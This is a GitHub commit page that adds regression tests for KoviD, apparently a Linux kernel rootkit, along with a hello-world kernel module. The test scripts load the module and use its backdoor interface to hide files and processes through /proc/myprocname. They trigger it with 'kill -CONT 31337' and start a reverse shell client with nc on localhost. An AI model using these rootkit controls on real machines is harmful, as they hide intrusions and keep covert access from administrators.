-
Notifications
You must be signed in to change notification settings - Fork 55
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #147 from carloslack/regression-tests-v2.1.1
Regression tests v2.1.1
- Loading branch information
Showing
14 changed files
with
179 additions
and
15 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
obj-m = hello.o | ||
|
||
all: | ||
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules | ||
|
||
clean: | ||
make --C /lib/modules/$(shell uname -r)/build M=$(PWD) clean |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
#include <linux/module.h> | ||
#include <linux/kernel.h> | ||
#include <linux/init.h> | ||
|
||
MODULE_LICENSE("GPL"); | ||
|
||
MODULE_DESCRIPTION("A simple Hello world LKM!"); | ||
|
||
MODULE_VERSION("0.1"); | ||
|
||
static int __init hello_start(void) | ||
{ | ||
printk(KERN_INFO "Loading hello module...\n"); | ||
printk(KERN_INFO "Hello world\n"); | ||
return 0; | ||
} | ||
|
||
static void __exit hello_end(void) | ||
{ | ||
printk(KERN_INFO "Goodbye!!!\n"); | ||
} | ||
|
||
module_init(hello_start); | ||
module_exit(hello_end); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
int main() | ||
{ | ||
while(1); | ||
|
||
return 0; | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
# REQUIRES: 0 | ||
# REQUIRES: DEBUG_ONLY | ||
# REQUIRES: NATIVE_TESTS | ||
|
||
# RUN: bash %s > %t.log | ||
# RUN: FileCheck-18 --input-file=%t.log %s | ||
|
||
sudo insmod ../../../build/kovid.ko | ||
kill -CONT 31337 | ||
|
||
TEST_FILE="hidden_file.txt" | ||
|
||
# Create a file with the same name in another directory | ||
OTHER_DIR="/tmp/other_dir" | ||
mkdir -p "$OTHER_DIR" | ||
touch "$OTHER_DIR/$TEST_FILE" | ||
|
||
# Hide the file using the backdoor | ||
echo hide-file-anywhere="$TEST_FILE" > /proc/myprocname | ||
|
||
# Check that files with the same name in other directories are also hidden | ||
ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory" | ||
|
||
# Cleanup | ||
rm -rf "$OTHER_DIR" | ||
|
||
# Remove the kernel module | ||
sudo rmmod kovid | ||
|
||
# CHECK: File is hidden in other directory |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
# REQUIRES: 0 | ||
# REQUIRES: DEBUG_ONLY | ||
# REQUIRES: NATIVE_TESTS | ||
|
||
# RUN: bash %s > %t.log | ||
# RUN: FileCheck-18 --input-file=%t.log %s | ||
|
||
sudo insmod ../../../build/kovid.ko | ||
kill -CONT 31337 | ||
|
||
# Create a test directory and file | ||
TEST_DIR="/tmp/test_hide_file" | ||
TEST_FILE="hidden_file.txt" | ||
mkdir -p "$TEST_DIR" | ||
touch "$TEST_DIR/$TEST_FILE" | ||
|
||
# Hide the file using the backdoor | ||
echo hide-file="$TEST_DIR/$TEST_FILE" > /proc/myprocname | ||
|
||
# Verify that the file is hidden when listing the directory | ||
ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden" | ||
|
||
# Cleanup | ||
rm -rf "$TEST_DIR" | ||
|
||
# Remove the kernel module | ||
sudo rmmod kovid | ||
|
||
# CHECK: File is hidden |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
# REQUIRES: 0 | ||
# REQUIRES: DEBUG_ONLY | ||
# REQUIRES: NATIVE_TESTS | ||
|
||
# RUN: bash %s > %t.log | ||
# RUN: FileCheck-18 --input-file=%t.log %s | ||
|
||
sudo insmod ../../../build/kovid.ko | ||
|
||
# Start the reverse shell in the background, suppressing its output | ||
sudo timeout 20 ../../../scripts/bdclient.sh nc localhost 9999 > /dev/null 2>&1 & | ||
|
||
# Allow the reverse shell to initialize | ||
sleep 1 | ||
|
||
# Send a signal to the "kill -CONT 31337" process as an additional check | ||
kill -CONT 31337 || echo "sh: can't kill pid 31337: No such process" | ||
|
||
# Run the `a.out` executable in the background and capture its PID | ||
./Inputs/a.out & | ||
AOUT_PID=$! | ||
|
||
# Wait briefly to ensure the process has started | ||
sleep 1 | ||
|
||
# Hide the process using the backdoor functionality | ||
echo hide-task-backdoor=$AOUT_PID > /proc/myprocname | ||
|
||
# Attempt to kill the hidden process and verify that it fails | ||
kill -9 "$AOUT_PID" || echo "sh: can't kill pid $AOUT_PID: No such process" | ||
|
||
# Remove the module | ||
sudo rmmod kovid | ||
|
||
# CHECK: sh: can't kill pid 31337: No such process | ||
# CHECK: sh: can't kill pid {{.*}}: No such process |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
# REQUIRES: 0 | ||
# REQUIRES: DEBUG_ONLY | ||
# REQUIRES: NATIVE_TESTS | ||
|
||
## Make sure you enter `test/native/Inputs` and run `make` | ||
## in order to build `hello.ko`. | ||
|
||
# RUN: bash %s > %t.log | ||
# RUN: FileCheck-18 --input-file=%t.log %s | ||
|
||
sudo dmesg -c | ||
sleep 2 | ||
sudo insmod ../../../test/native/Inputs/hello.ko | ||
sudo rmmod hello | ||
sudo dmesg | ||
|
||
# CHECK: Loading hello module... | ||
# CHECK: Hello world |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters